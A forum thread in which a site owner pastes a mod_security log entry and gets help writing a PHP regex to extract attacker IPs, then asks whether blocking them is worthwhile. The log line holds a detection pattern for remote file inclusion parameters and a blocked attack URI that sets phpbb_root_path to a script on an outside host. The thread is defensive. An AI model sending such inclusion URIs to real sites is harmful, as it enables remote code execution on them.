Forum Moderators: coopster
[Fri Mar 28 15:18:39 2008] [error] [client nnn.nnn.nnn.0] mod_security: Access denied with code 406. Pattern match "(THEME_DIR¦siteurl¦set¦pagina¦BBCodeFile¦page¦basepath¦fondo¦ root_path¦pg¦classes_dir¦CONFIGFILE¦css_path¦phpraid_dir¦story¦ sbp¦vwar_root¦cart_isp_root¦mosConfig_absolute_path¦mosConfig_live_site¦ inc_dir¦rootSys¦CONFIG_EXT\\\\[LANGUAGES_DIR\\\\]¦CONFIG\\\\[path\\\\]¦ vwar_root¦pathtoashnews¦php\\\\?dir¦aedating4CMS.php\\\\?dir\\\\[inc\\\\]¦ includes\\\\/include_once\\\\.php\\\\?include_file¦Home_Path¦adm_path¦ systempath¦path)=http" at THE_REQUEST [severity "EMERGENCY"] [hostname "www.mysite.com"] [uri "/forum-viewtopic-t-196.html//includes/functions_portal.php?phpbb_root_path=http://example.com/new/id.txt?"]
So the IP always seems to be preceded with [error] and followed by mod_security: Access denied with code 406
So how would I come up with a regex that would extract these IPs that I can use with preg_match_all?
thanks,
brian
[edited by: jatar_k at 12:08 am (utc) on Mar. 29, 2008]
[edited by: coopster at 1:11 pm (utc) on Mar. 29, 2008]
[edit reason] fixed sidescroll [/edit]
How's your regex?
[edited by: coopster at 1:12 pm (utc) on Mar. 29, 2008]
[edit reason] generalized IP in msg so changed this one to match! [/edit]
$ipreg="/([1-9]{1}\d{1}¦[1-9]{1,2}¦1\d\d¦2[0-4]\d¦25[0-5])\.(\d{1}¦[1-9]{1}\d{1}¦1\d\d¦2[0-4]\d¦25[0-5])\.(\d{1}¦[1-9]{1}\d{1}¦1\d\d¦2[0-4]\d¦25[0-5])\.(\d{1}¦[1-9]{1}\d{1}¦1\d\d¦2[0-4]\d¦25[0-5])/";
But I need to figure out what to add to it so it just matches the IPs that are asscoaited witht he security breach.
thanks,
brian
$ipreg= "/\[client ([\d.]+)\] mod_security/";
Now I wonder if it worth blocking these ips. There are hundreds. If I add them to htaccess, I am afraid it will slow down my site...
thanks,
brian
Besides, mod_security is catching them, so I reckon you're OK.
